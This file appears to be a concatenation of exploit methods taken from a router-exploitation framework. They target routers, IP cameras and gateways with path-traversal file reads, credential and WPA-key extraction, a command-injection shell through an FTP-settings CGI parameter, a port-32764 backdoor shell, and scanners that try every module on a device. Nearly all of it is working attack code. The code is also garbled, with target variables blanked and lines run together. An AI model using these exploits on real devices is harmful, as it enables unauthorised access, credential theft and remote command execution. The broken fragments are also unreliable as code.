def run(self): if self.check(): print_success("Target is vulnerable") url = "{}:{}".format(, self.port) print_info("Visit: {}/\n".format(url)) else: print_error("Target seems to be not vulnerable")
def run(self): # address and parameters url = "{}:{}/cgi-bin/webproc".format(, self.port) data = { "getpage": "html/index.html", "*errorpage*": "../../../../../../../../../../..{}".format(self.filename), "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "******", "%3Apassword": "******", "%3Aaction": "login", "%3Asessionid": "abcdefgh" } # connection response = http_request(method="POST", url=url, data=data) if response is None: return if response.status_code == 200: print_success("Exploit success") print_status("File: {}".format(self.filename)) print_info(response.text) else: print_error("Exploit failed")
def run(self): if self.check(): print_success("Target seems to be vulnerable") file_path = "..{}".format(self.filename) url = "{}:{}/apply.cgi".format(, self.port) data = {"html_response_page": file_path, "action": "do_graph_auth", "login_name": "test", "login_pass": "******", "&login_n": "test2", "log_pass": "******", "graph_code": "63778", "session_id": "test5", "test": "test"} print_status("Sending request payload using credentials: {} / {}".format(self.username, self.password)) response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password)) if response is None: return if response.status_code == 200: print_status("File: {}".format(self.filename)) print_info(response.text) else: print_error("Exploit failed - could not read response") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target seems to be vulnerable") url = "{}:{}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C..{}" \ .format(, self.port, self.filename) response = http_request(method="GET", url=url) if response is None: print_error("Exploit failed - could not read response") return print_status("Trying to read file: {}".format(self.filename)) if any( err in response.text for err in ['Error 404 NOT_FOUND', 'Problem accessing', 'HTTP ERROR 404' ]): print_status("File does not exist: {}".format(self.filename)) return if response.text: print_info(response.text) else: print_status("File seems to be empty") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target appears to be vulnerable") print_status("Dumping configuration...") print_info(self.configuration) else: print_error("Exploit failed - target does not appear vulnerable")
def hexdump(self, s): for b in xrange(0, len(s), 16): lin = [c for c in s[b:b + 16]] hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.') for c in lin) print_info(' %04x: %-48s %s' % (b, hxdat, pdat)) print
def run(self): self.vulnerabilities = [] self.not_verified = [] target = utils.safe_json_loads( if target: = target with threads.ThreadPoolExecutor(self.threads) as executor: for directory in self._exploits_directories: for exploit in utils.iter_modules(directory): executor.submit(self.target_function, exploit) print_info() if self.not_verified: print_status("Could not verify exploitability:") for v in self.not_verified: print_info(" - {}".format(v)) print_info() if self.vulnerabilities: print_success("Device is vulnerable:") for v in self.vulnerabilities: print_info(" - {}".format(v)) print_info() else: print_error("Could not confirm any vulnerablity\n")
def run(self): if self.check(): print_success("Target is vulnerable") print_info("\nUse your browser:") print_info("{}:{}/xslt".format(, self.port)) else: print_error("Target seems to be not vulnerable")
def run(self): vulnerabilities = [] for exploit in utils.iter_modules(utils.EXPLOITS_DIR): exploit = exploit() = exploit.port = self.port response = exploit.check() if response is True: print_success("{} is vulnerable".format(exploit)) vulnerabilities.append(exploit) elif response is False: print_error("{} is not vulnerable".format(exploit)) else: print_status("{} could not be verified".format(exploit)) if vulnerabilities: print_info() print_success("Device is vulnerable!") for v in vulnerabilities: print_info(" - {}".format(v)) else: print_error("Device is not vulnerable to any exploits!\n")
def run(self): if self.check(): url = "{}:{}/password.cgi".format(, self.port) print_status("Requesting for {}".format(url)) response = http_request(method="GET", url=url) if response is None: return regexps = [("admin", "pwdAdmin = '(.+?)'"), ("support", "pwdSupport = '(.+?)'"), ("user", "pwdUser = '******'")] creds = [] for regexp in regexps: res = re.findall(regexp[1], response.text) if len(res): creds.append((regexp[0], b64decode(res[0]))) if len(creds): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *creds) print_info("NOTE: Admin is commonly implemented as root") else: print_error("Credentials could not be found") else: print_error("Device seems to be not vulnerable")
def run(self): response = self.telnet_login() if 'Login not allowed' in response and self.is_port_opened(self.ftp_port): print_error("Telnet: {}:{} Authentication through Telnet not allowed".format(, self.telnet_port)) print_status("FTP and HTTP service active") creds = self.ftp_get_config() if creds: print_status("Use javascript console (through developer tools) to bypass authentication:") payload = ('var user = "******"\n' 'var hash2 = "{}";\n' 'var HA2 = MD5("GET" + ":" + uri);\n' 'document.getElementById("user").value = user;\n' 'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n' 'document.authform.submit();\n') for user in creds: print_success("User: {} Role: {}".format(user[0], user[2])) print_info(payload.format(user[0], user[3])) elif '}=>' in response: print_success("Successful authentication through Telnet service") tn = telnetlib.Telnet(, int(self.telnet_port), timeout=10) tn.read_until(': ') tn.write(self.remote_user + '\r\n') tn.read_until(': ') tn.write(self.remote_pass + '\r\n') tn.interact() else: print_error("Exploit failed - target seems to be not vulnerable")
def command_loop(self): while 1: cmd = raw_input("cmd > ") try: print_info(self.execute(cmd)) except socket.timeout: print_error("No response received. The exploit tends to be unstable though. It is worth trying to run the same command again.")
def run(self): self.session = requests.Session() if self.check(): print_success("Target seems to be vulnerable") print_status("Trying to authenticate") if self.login(): file_path = "../../..{}".format(self.path) url = "{}:{}/events/reports/view.cgi?download=1&files={}%00".format(, self.port, file_path) print_status("Requesting: {}".format(file_path)) response = http_request(method="GET", url=url, session=self.session) if response is None: print_error("Exploit failed") return print_status("Reading response...") if not len(response.text) or "empty or is not available to view" in response.text: print_error("Exploit failed. Empty response.") else: print_info(response.text) else: print_error("Exploit failed. Could not authenticate.") else: print_error("Exploit failed. Target seems to be not vulnerable.")
def run(self): if self.check(): print_success("Target seems to be vulnerable") print_status("Dumping configuration...") print_info(self.content) else: print_error("Exploit failed - target seems to be not vulnerable")
def hexdump(self, s): for b in xrange(0, len(s), 16): lin = [c for c in s[b: b + 16]] hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in lin) print_info(' %04x: %-48s %s' % (b, hxdat, pdat)) print
def run(self): url = "{}:{}/UD/?5".format(, self.port) headers = { 'SOAPACTION': '"urn:dslforum-org:service:UserInterface:1#GetLoginPassword"', 'Content-Type': 'text/xml; charset="utf-8"', 'Expect': '100-continue' } data = ( "<?xml version=\"1.0\"?>" "<s:Envelope xmlns:s=\"\" s:encodingStyle=\"\">" "<s:Body>" "<m:GetLoginPassword xmlns:m=\"urn:dslforum-org:service:UserInterface:1\">" "</m:GetLoginPassword>" "</s:Body>" "</s:Envelope>") response = http_request(method="POST", url=url, headers=headers, data=data) if response is None: return r = re.compile('<NewUserpassword>(.*?)</NewUserpassword>') m = if m: print_success("Password has been found") print_info("Password: {}".format( else: print_error("Exploit failed - could not find password")
def command_loop(self): while 1: cmd = raw_input("cmd > ") if cmd in ['exit', 'quit']: return print_info(self.execute(cmd))
def execute(self, cmd): # Get credentials print_status("Extracting credentials") credential_url = sanitize_url( "{}:{}/system.ini?loginuse&loginpas".format(, self.port)) response = http_request(method="GET", url=credential_url) # Find the magic sequence "0000 0a0a 0a0a 01" magic_sequence_location = response.content.find( b'\x00\x00\x0a\x0a\x0a\x0a\x01') # Skip ahead by 144 bytes to the beginning of username username_location = magic_sequence_location + 144 # Read every byte in a loop until the first '\x00' # THIS WILL NOT WORK UNDER PYTHON 3 (bytearrays return ints in py3)! username_bytes = bytearray() next_username_byte = bytes() index = username_location while next_username_byte != b'\x00': username_bytes.append(response.content[index]) next_username_byte = response.content[index + 1] index = index + 1 username = username_bytes.decode('utf-8') print_info("Username: "******"Password: "******"{}:{}/set_ftp.cgi?next_url=ftp.htm&loginuse={}&loginpas={}&svr=$({})&dir=/&mode=PORT&upload_interval=0".format(, self.port, username, password, cmd) http_request(method="GET", url=command_url) # Run command run_url = "{}:{}/ftptest.cgi?next_url=test_ftp.htm&loginuse={}&loginpas={}".format(, self.port, username, password) http_request(method="GET", url=run_url) time.sleep(2) return ""
def command_loop(self): while 1: cmd = raw_input("cmd > ") try: print_info(self.execute(cmd)) except socket.timeout: print_error( "No response received. The exploit tends to be unstable though. It is worth trying to run the same command again." )
def run(self): url = "{}:{}/filename.gwc".format(, self.port) response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and "User Password" in response.text: print_success("Exploit success - reading configuration file filename.gwc") print_info(response.text) else: print_error("Exploit failed - could not read configuration file")
def run(self): url = "{}:{}/ccmivr/{}".format(, self.port, self.filename) response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and len(response.text): print_success("Exploit success - reading file {}".format(self.filename)) print_info(response.text) else: print_error("Exploit failed - could not read file")
def run(self): url = "{}:{}/GatewaySettings.bin".format(, self.port) response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and "0MLog" in response.text: print_success("Exploit success") print_status("Reading file GatewaySettings.bin") print_info(response.text) else: print_error("Exploit failed. Device seems to be not vulnerable.")
def command_loop(self): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(30) s.connect((, 32764)) while(1): cmd = raw_input("cmd > ") if cmd in ['quit', 'exit']: s.close() return print_info(self.execute(s, 7, cmd.strip("\n")))
def run(self): url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(, self.port, self.filename) response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and len(response.text): print_success("Exploit success") print_status("Reading file: {}".format(self.filename)) print_info(response.text) else: print_error("Exploit failed - could not read file")
def run(self): url = "{}:{}/ccmivr/{}".format(, self.port, self.filename) response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and len(response.text): print_success("Exploit success - reading file {}".format( self.filename)) print_info(response.text) else: print_error("Exploit failed - could not read file")
def run(self): url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(, self.port, self.filename) response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and len(response.text): print_success("Exploit success") print_status("Reading file: {}".format(self.filename)) print_info(response.text) else: print_error("Exploit failed - could not read file")
def run(self): if self.check(): url = "{}:{}{}".format(, self.port, self.valid) print_status("Sending payload request") response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and len(response.text): print_success("Exploit success") print_info(response.text) else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target seems to be vulnerable") url = "{}:{}/.htpasswd".format(, self.port) response = http_request(method="GET", url=url) if response is None: print_error("Exploit failed - connection error") return print_info("Unix crypt hash: $id$salt$hashed") # See more at print_success("Hash found:", response.text) else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): url = sanitize_url("{}:{}/system.ini?loginuse&loginpas".format(, self.port)) response = requests.get(url) print_info("Exploit succeeded, extracting credentials...") # May the lord forgive me for writing such spaghetti # Find the magic sequence "0000 0a0a 0a0a 01" magic_sequence_location = response.content.find( b'\x00\x00\x0a\x0a\x0a\x0a\x01') # Skip ahead by 144 bytes to the beginning of username username_location = magic_sequence_location + 144 # Read every byte in a loop until the first '\x00' # THIS WILL NOT WORK UNDER PYTHON 3! username_bytes = bytearray() next_username_byte = bytes() index = username_location while next_username_byte != b'\x00': username_bytes.append(response.content[index]) next_username_byte = response.content[index + 1] index = index + 1 username = username_bytes.decode('utf-8') print_success("Username: "******"Password: "******"Exploit failed. Device seems to be not vulnerable.")
def run(self): if self.check(): url = "{}:{}/cgi-bin/webproc?getpage={}&var:language=es_es&var:page=".format(, self.port, self.filename) response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and len(response.text): print_success("Success! File: %s" % self.filename) print_info(response.text) else: print_error("Exploit failed") else: print_error("Device seems to be not vulnerable")
def run(self): for resource in self.resources: url = "{}:{}{}".format(, self.port, resource) print_status("Sending request to download sensitive information") response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and "password" in response.text: print_succcess("Exploit success") print_status("Reading {} file".format(resource)) print_info(response.text) else: print_error("Exploit failed - could not retrieve response")
def run(self): if self.check(): url = "{}:{}/../../../../../../../../../../../..{}".format(, self.port, self.filename) response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and response.text: print_success("Success! File: %s" % self.filename) print_info(response.text) else: print_error("Exploit failed") else: print_error("Device seems to be not vulnerable")
def run(self): if self.check(): print_success("Target seems to be vulnerable") url = "{}:{}/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..{}".format(, self.port, self.filename) print_status("Sending paylaod request") response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and len(response.text): print_success("Exploit success - reading {} file".format(self.filename)) print_info(response.text) else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): for resource in self.resources: url = "{}:{}{}".format(, self.port, resource) print_status("Sending request to download sensitive information") response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and "password" in response.text: print_success("Exploit success") print_status("Reading {} file".format(resource)) print_info(response.text) else: print_error("Exploit failed - could not retrieve response")
def run(self): if self.check(): url = "{}:{}/../../../../../../../../../../../..{}".format(, self.port, self.filename) response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and response.text: print_success("Success! File: %s" % self.filename) print_info(response.text) else: print_error("Exploit failed") else: print_error("Device seems to be not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") url = "{}:{}/level/{}/exec/-/{}".format(, self.port, self.access_level, self.show_command) response = http_request(method="GET", url=url) if response is None: print_error( "Could not execute command") # target is not vulnerable return else: print_success("Exploit success! - executing command") print_info(re.sub('<[^<]+?>', '', response.text)) else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(10) print_status("Sending exploit payload") sock.sendto(self.payload, (, 43690)) try: print_status("Waiting for response") response = sock.recv(1024) except Exception: print_error("Exploit failed - device seems to be not vulnerable") return if len(response): print_success("Exploit success") print_info(response)
def run(self): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(10) print_status("Sending exploit payload") sock.sendto(self.payload, (, 43690)) try: print_status("Waiting for response") response = sock.recv(1024) except: print_error("Exploit failed - device seems to be not vulnerable") return if len(response): print_success("Exploit success") print_info(response)
def run(self): if self.check(): print_success("Target seems to be vulnerable") url = "{}:{}/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..{}".format(, self.port, self.filename) print_status("Sending paylaod request") response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and len(response.text): print_success("Exploit success - reading {} file".format( self.filename)) print_info(response.text) else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target seems to be vulnerable") url = "{}:{}{}".format(, self.port, self.valid) print_status("Sending request to download sensitive information") response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and len(response.text): print_status("Reading {}".format(self.valid)) print_info(response.text) else: print_error("Exploit failed - could not retrieve response") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(10) print_status("Sending payload") sock.sendto(self.payload, (, 69)) try: response = sock.recv(2048) except: print_error("Exploit failed - device seems to be not vulnerable") return if len(response): if "UseUserCredential" in response: print_success("Exploit success - file {}".format("SPDefault.cnf.xml")) print_info(response) else: print_error("Exploit failed - credentials not found in response") else: print_error("Exploit failed - empty response")
def run(self): if self.check(): print_success("Target is vulnerable") url1 = "{}:{}//etc/RT2870STA.dat".format(, self.port) url2 = "{}:{}/get_status.cgi".format(, self.port) url3 = "{}:{}//proc/kcore".format(, self.port) response = http_request(method="GET", url=url1) if response is not None and "WPAPSK" in response.text: print_success("WPA Password is in this text:") print_info(response.text) else: print_error("Could not find WPA password") print_info("Trying to gather more info") response = http_request(method="GET", url=url2) if response is not None and "ddns_host" in response.text: print_success("ddns host name:") print_info(response.text) else: print_error("could not read ddns host name") print_status("Trying to find username and password from running memory leak") print_status("This could take some time") print_status("password is usually stuck next to 'admin' e.g admin123456") response = http_request(method="GET", url=url3, stream=True) try: for chunk in response.iter_content(chunk_size=100): if "admin" in chunk: print_success(chunk) except Exception: print_error("Exploit failed - could not read /proc/kcore")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Sending read {} file request".format(self.filename)) url = "{}:{}/goform/enhAuthHandler".format(, self.port) headers = {u"Content-Type": u"application/x-www-form-urlencoded"} data = {"__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../..{}".format(self.filename), "__ENH_SUBMIT_VALUE_SHOW__": "Acceder", "__ENH_ERROR_REDIRECT_PATH__": "", "username": "******"} response = http_request(method="POST", url=url, headers=headers, data=data) if response is None: return print_status("Reading file {}".format(self.filename)) print_info(response.text) else: print_error("Target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") url = "{}:{}/help/../../../../../../../../../../../../../../../..{}".format(, self.port, self.filename) print_status("Sending payload request") response = http_request(method="GET", url=url) if response is None: return if response.status_code == 200 and len(response.text): pos = response.text.find("//--></SCRIPT>") + 15 res = response.text[pos:] if len(res): print_status("Reading file {}".format(self.filename)) print_info(res) else: print_error("Could not read file {}".format(self.filename)) else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target seems to be vulnerable") print_info(self.content) print_info("please login at:") print_info("{}:{}/cgi-bin/chklogin.cgi".format(, self.port)) else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): rootpath = 'routersploit/modules/' path = 'exploits' modules = [] for device in listdir(rootpath+path): # TODO refactor this, using load_modules() from core if not device.endswith(".py") and not device.endswith(".pyc"): for f in listdir(rootpath+path + "/" + device): if f.endswith(".py") and f != "": modules.append(device + "/" + f[:-3]) vulnerabilities = [] for module_name in modules: f = "".join((path, "/", module_name)) module = imp.load_source('module', rootpath + f + '.py') exploit = module.Exploit() = exploit.port = self.port response = exploit.check() if response is True: print_success("{} is vulnerable".format(f)) vulnerabilities.append(f) elif response is False: print_error("{} is not vulnerable".format(f)) else: print_status("{} could not be verified".format(f)) if vulnerabilities: print print_success("Device is vulnerable!") for v in vulnerabilities: print_info(" - {}".format(v)) else: print_error("Device is not vulnerable to any exploits!\n")